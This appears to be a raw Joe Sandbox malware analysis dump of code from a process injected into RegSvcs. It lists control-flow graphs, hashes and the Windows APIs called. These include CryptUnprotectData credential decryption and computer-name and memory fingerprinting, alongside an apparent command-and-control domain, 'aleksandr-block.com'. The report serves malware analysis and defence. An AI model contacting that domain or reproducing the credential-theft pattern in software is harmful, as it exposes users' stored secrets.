                                                                      • Opcode Fuzzy Hash: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                                      • Instruction Fuzzy Hash: 1F52E172A083508FD718CF28C89176BBBE2EFC9310F14992EE6D59B391D7759805CB86

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 105 423e44-423e49 106 423e52 105->106 107 423e4b-423e50 105->107 108 423e55-423e75 call 407f80 RtlExpandEnvironmentStrings 106->108 107->108 111 423e84-423e8c 108->111 112 423e7c 108->112 113 423e95 111->113 114 423e8e-423e93 111->114 112->111 115 423e9c-423ed9 call 407f80 113->115 114->115 118 423ee0-423f06 115->118 118->118 119 423f08-423f10 118->119 120 423f12-423f17 119->120 121 423f31-423f3e 119->121 122 423f20-423f2f 120->122 123 423f40-423f44 121->123 124 423f61-423f7d call 443390 121->124 122->121 122->122 125 423f50-423f5f 123->125 128 423fb6-424067 124->128 129 423f94 124->129 130 423f84-423f8b 124->130 131 424269-424271 124->131 132 423f9e-423fa6 124->132 125->124 125->125 135 424070-4240a2 128->135 129->132 130->129 136 424273-424278 131->136 137 424280 131->137 133 4240ca 132->133 134 423fac-423fb1 132->134 138 4240d1-42417a call 407f80 133->138 134->138 135->135 139 4240a4-4240b8 call 420440 135->139 140 424287-424337 call 407f80 136->140 137->140 147 424180-4241cd 138->147 144 4240bd-4240c2 139->144 148 424340-42438c 140->148 144->133 147->147 150 4241cf-4241df 147->150 148->148 149 42438e-4243a2 148->149 151 4243c1-4243d2 149->151 152 4243a4-4243a6 149->152 153 424201-42420e 150->153 154 4241e1-4241e6 150->154 158 424250-424260 call 443390 151->158 159 4243d8-4243df 151->159 157 4243b0-4243bf 152->157 155 424210-424214 153->155 156 424231-424244 call 443390 153->156 160 4241f0-4241ff 154->160 161 424220-42422f 155->161 156->131 157->151 157->157 158->131 163 4243e0-4243ef 159->163 160->153 160->160 161->156 161->161 163->163 166 4243f1 163->166 166->158
                                                                      APIs
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentExpandStrings
                                                                      • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                                      • API String ID: 237503144-2105826625
                                                                      • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                      • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                                      • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                      • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: Object$DeleteMetricsSelectSystem
                                                                      • String ID: $AnC$phC
                                                                      • API String ID: 3911056724-4014303587
                                                                      • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                      • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                                      • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                      • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 181 408740-408751 call 43f980 184 408a02-408a04 ExitProcess 181->184 185 408757-40875e call 438b80 181->185 188 408764-408788 GetCurrentProcessId GetCurrentThreadId 185->188 189 4089fd call 440240 185->189 191 40878a-40878c 188->191 192 40878e-408852 SHGetSpecialFolderPathW GetForegroundWindow 188->192 189->184 191->192 193 408858-4088dd 192->193 194 4088df-408904 192->194 193->194 195 408910-40894f 194->195 195->195 196 408951-40898f call 43e840 195->196 199 408990-4089ac 196->199 200 4089c6-4089df call 409a60 199->200 201 4089ae-4089c4 199->201 204 4089e1 call 40c980 200->204 205 4089eb-4089f2 200->205 201->199 208 4089e6 call 40b5d0 204->208 205->189 207 4089f4-4089fa call 407f90 205->207 207->189 208->205
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                                      • GetForegroundWindow.USER32 ref: 0040884A
                                                                      • ExitProcess.KERNEL32 ref: 00408A04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                      • String ID: b/7
                                                                      • API String ID: 4063528623-2085417233
                                                                      • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                      • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                                      • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                      • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 212 40d690-40d6bf call 436590 call 4095a0 CoUninitialize 217 40d6c0-40d6fb 212->217 217->217 218 40d6fd-40d712 217->218 219 40d720-40d745 218->219 219->219 220 40d747-40d789 219->220 221 40d790-40d7c6 220->221 221->221 222 40d7c8-40d7d2 221->222 223 40d7d4-40d7d7 222->223 224 40d7eb-40d7f8 222->224 225 40d7e0-40d7e9 223->225 226 40d7fa-40d7ff 224->226 227 40d80d 224->227 225->224 225->225 228 40d800-40d809 226->228 229 40d810-40d81b 227->229 228->228 230 40d80b 228->230 231 40d82b-40d835 229->231 232 40d81d-40d81f 229->232 230->229 234 40d837-40d838 231->234 235 40d84b-40d853 231->235 233 40d820-40d829 232->233 233->231 233->233 236 40d840-40d849 234->236 237 40d855-40d856 235->237 238 40d86b-40d877 235->238 236->235 236->236 241 40d860-40d869 237->241 239 40d891-40d946 238->239 240 40d879-40d87b 238->240 243 40d950-40d960 239->243 242 40d880-40d88d 240->242 241->238 241->241 242->242 244 40d88f 242->244 243->243 245 40d962-40d982 243->245 244->239 246 40d990-40d9d5 245->246 246->246 247 40d9d7-40d9f4 call 40b600 246->247 249 40d9f9-40da26 247->249
                                                                      APIs
                                                                        • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                                        • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                                        • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                                        • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                                        • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                                        • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                                      • CoUninitialize.COMBASE ref: 0040D6A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                      • String ID: ;d$SD$TC03$^_/C$aleksandr-block.com
                                                                      • API String ID: 1556769885-2203050157
                                                                      • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                      • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                                      • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                      • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 365 42dee5-42deff 366 42df00-42df6a 365->366 366->366 367 42df6c-42df74 366->367 368 42df76-42df7f 367->368 369 42df8d-42df93 367->369 370 42df80-42df89 368->370 371 42df95-42ed01 369->371 370->370 372 42df8b 370->372 374 42ed10-42ed3d 371->374 372->371 374->374 375 42ed3f-42ed44 374->375 376 42ed46-42ed49 375->376 377 42ed5d 375->377 379 42ed50-42ed59 376->379 378 42ed5f-42ed6b 377->378 381 42ed81-42eda4 call 441c60 378->381 382 42ed6d-42ed6f 378->382 379->379 380 42ed5b 379->380 380->378 386 42eda9-42edc6 GetPhysicallyInstalledSystemMemory 381->386 384 42ed70-42ed7d 382->384 384->384 385 42ed7f 384->385 385->381 387 42edd0-42edf7 386->387 387->387 388 42edf9-42ee2e call 41c7d0 387->388 391 42ee30-42ee85 388->391 391->391 392 42ee87-42ee8f 391->392 393 42ee91-42ee97 392->393 394 42eead-42eeaf 392->394 396 42eea0-42eea9 393->396 395 42eeb2-42eebf 394->395 398 42eec1-42eec2 395->398 399 42eedb-42eee5 395->399 396->396 397 42eeab 396->397 397->395 402 42eed0-42eed9 398->402 400 42eee7-42eee8 399->400 401 42eefb-42ef3f 399->401 403 42eef0-42eef9 400->403 404 42ef40-42ef85 401->404 402->399 402->402 403->401 403->403 404->404 405 42ef87-42ef8c 404->405 406 42ef8e-42ef94 405->406 407 42efad-42efb0 405->407 408 42efa0-42efa9 406->408 409 42efb2-42efba 407->409 408->408 410 42efab 408->410 411 42efcb-42f08e 409->411 412 42efbc-42efbf 409->412 410->409 413 42efc0-42efc9 412->413 413->411 413->413
                                                                      APIs
                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                      • String ID: $qk$'5%s
                                                                      • API String ID: 3960555810-1674721824
                                                                      • Opcode ID: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                                      • Instruction ID: 77e35e584cd91eb5155daa22bb8d7f3faef11dd04174e3cb06e18610c7d197b5
                                                                      • Opcode Fuzzy Hash: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                                      • Instruction Fuzzy Hash: C6D1D4716047428FD719CF2AC491762FBE2BF96300B2DC5AEC4DA8B752D739A806CB54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 414 42ecd0-42ed01 call 435ec0 call 407f90 420 42ed10-42ed3d 414->420 420->420 421 42ed3f-42ed44 420->421 422 42ed46-42ed49 421->422 423 42ed5d 421->423 425 42ed50-42ed59 422->425 424 42ed5f-42ed6b 423->424 427 42ed81-42edc6 call 441c60 GetPhysicallyInstalledSystemMemory 424->427 428 42ed6d-42ed6f 424->428 425->425 426 42ed5b 425->426 426->424 433 42edd0-42edf7 427->433 430 42ed70-42ed7d 428->430 430->430 431 42ed7f 430->431 431->427 433->433 434 42edf9-42ee2e call 41c7d0 433->434 437 42ee30-42ee85 434->437 437->437 438 42ee87-42ee8f 437->438 439 42ee91-42ee97 438->439 440 42eead-42eeaf 438->440 442 42eea0-42eea9 439->442 441 42eeb2-42eebf 440->441 444 42eec1-42eec2 441->444 445 42eedb-42eee5 441->445 442->442 443 42eeab 442->443 443->441 448 42eed0-42eed9 444->448 446 42eee7-42eee8 445->446 447 42eefb-42ef3f 445->447 449 42eef0-42eef9 446->449 450 42ef40-42ef85 447->450 448->445 448->448 449->447 449->449 450->450 451 42ef87-42ef8c 450->451 452 42ef8e-42ef94 451->452 453 42efad-42efb0 451->453 454 42efa0-42efa9 452->454 455 42efb2-42efba 453->455 454->454 456 42efab 454->456 457 42efcb-42f08e 455->457 458 42efbc-42efbf 455->458 456->455 459 42efc0-42efc9 458->459 459->457 459->459
                                                                      APIs
                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                      • String ID: $qk$'5%s
                                                                      • API String ID: 3960555810-1674721824
                                                                      • Opcode ID: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                                      • Instruction ID: 774d1c6582b6df23f03d333cf1ee8e77294ae5f4637bee10b1881aef683745b3
                                                                      • Opcode Fuzzy Hash: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                                      • Instruction Fuzzy Hash: A4B1E1716047428BD719CF2AC450362FBE2BFA6300F6DC5AEC4DA8B752D739A846CB54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 551 40cb44-40cb8b CoInitializeSecurity * 2
                                                                      APIs
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeSecurity
                                                                      • String ID:
                                                                      • API String ID: 640775948-0
                                                                      • Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                      • Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
                                                                      • Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                      • Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                                      • Instruction ID: fd6d0c28c0521a4b2d3ba0d2fcd6f101c3ce844309344171b6c888af52a4c48d
                                                                      • Opcode Fuzzy Hash: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                                      • Instruction Fuzzy Hash: F5821975A04B408FD714DF38C985396BBE2AF85324F198A3DD4EB877D2E678A445CB02
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                                      • Instruction ID: 5b988ee3757d9e29ab9f296af5c767d3f7ba0e13420727c7ac46e6bec5acf77a
                                                                      • Opcode Fuzzy Hash: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                                      • Instruction Fuzzy Hash: 115134716446025FCB19CF29CCC1687BBE2FB89304F19806ED8999F357EA79E8438744
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: klm"
                                                                      • API String ID: 2994545307-2308819284
                                                                      • Opcode ID: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                                      • Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
                                                                      • Opcode Fuzzy Hash: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                                      • Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                                      • Instruction ID: 877a3ec0fd1df911aac285de86fc99df006a5b0b03a90c59e71951ea2dd66968
                                                                      • Opcode Fuzzy Hash: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                                      • Instruction Fuzzy Hash: 343128B5900B419FC7308F29CC84766BBE2BF55304F19496EE46ACB761D739E881CB44
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                                      • Instruction ID: 1a59348ec05e7f56259579615360e9f91351b56b2fbfb5c12ef62eceb2dabcd0
                                                                      • Opcode Fuzzy Hash: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                                      • Instruction Fuzzy Hash: 8111E3B59006419FC7248F25CC84BA6B7E2BF55704F29892ED86ACB761D73AF881CB44
                                                                      APIs
                                                                      • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WT
                                                                      • API String ID: 0-3626323073
                                                                      • Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                      • Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
                                                                      • Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                      • Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                                      • Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
                                                                      • Opcode Fuzzy Hash: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                                      • Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 534 40c9a6-40caf5 CoInitializeEx * 2
                                                                      APIs
                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CADC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: i.
                                                                      • API String ID: 2538663250-1725878519
                                                                      • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                      • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                                      • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                      • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 535 42f3c5-42f3f4 call 441c60 538 42f400-42f426 535->538 538->538 539 42f428-42f431 538->539 540 42f433-42f43b 539->540 541 42f44b-42f495 call 441c60 539->541 542 42f440-42f449 540->542 546 42f4a0-42f4c5 541->546 542->541 542->542 546->546 547 42f4c7-42f4ce 546->547 548 42f4d0-42f4d6 547->548 549 42f4eb-42f514 GetComputerNameExA 547->549 550 42f4e0-42f4e9 548->550 550->549 550->550
                                                                      APIs
                                                                      • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F4FE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: ComputerName
                                                                      • String ID: ABQH
                                                                      • API String ID: 3545744682-2857704541
                                                                      • Opcode ID: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                                      • Instruction ID: 5b9f06d29d21be6fc1f49ae5373236c4f88bea70ce57d6927e68f4d7a729ffcc
                                                                      • Opcode Fuzzy Hash: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                                      • Instruction Fuzzy Hash: CC3126742046928FD715CF24D890663BBF2EF66314F14816DD4E21BB42C379685ACBA5

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 004406A2
                                                                      • GetForegroundWindow.USER32 ref: 004406B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: ForegroundWindow
                                                                      • String ID:
                                                                      • API String ID: 2020703349-0
                                                                      • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                      • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                                      • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                      • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitVariant
                                                                      • String ID:
                                                                      • API String ID: 1927566239-0
                                                                      • Opcode ID: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                                      • Instruction ID: f7f883e2ad49da0fecad536576301c807aa78c4ca5f2a4f40745664147204c84
                                                                      • Opcode Fuzzy Hash: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                                      • Instruction Fuzzy Hash: 0A414F70108BC08EE365CB38C598757BFE16B56308F48489DD5D68BB92C7BAB509CB62
                                                                      APIs
                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: ComputerName
                                                                      • String ID:
                                                                      • API String ID: 3545744682-0
                                                                      • Opcode ID: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                                      • Instruction ID: 76e407ce98a51277e7cb13f46241631caeedb7dd1d9a2c9078d1ba909d45b5aa
                                                                      • Opcode Fuzzy Hash: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                                      • Instruction Fuzzy Hash: 122190742046928BEB158F25D4617B3BBE1EF53300F6885AAD4C69B392D7389C86CB64
                                                                      APIs
                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: ComputerName
                                                                      • String ID:
                                                                      • API String ID: 3545744682-0
                                                                      • Opcode ID: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
                                                                      • Instruction ID: d9a4f91a2702334bf36e07a4eed7b442d690e9a594b68c6ebc6cd94c5554eabc
                                                                      • Opcode Fuzzy Hash: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
